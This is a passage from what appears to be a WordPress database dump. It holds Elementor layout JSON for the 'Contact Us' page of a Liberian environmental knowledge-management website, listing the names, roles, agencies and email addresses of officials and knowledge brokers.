href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:ballah_@yahoo.com\\\">ballah_@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24623,3640,'_elementor_edit_mode','builder'),(24624,3640,'_elementor_template_type','wp-page'),(24625,3640,'_elementor_version','3.0.16'),(24626,3640,'_wp_page_template','default'),(24627,3640,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a 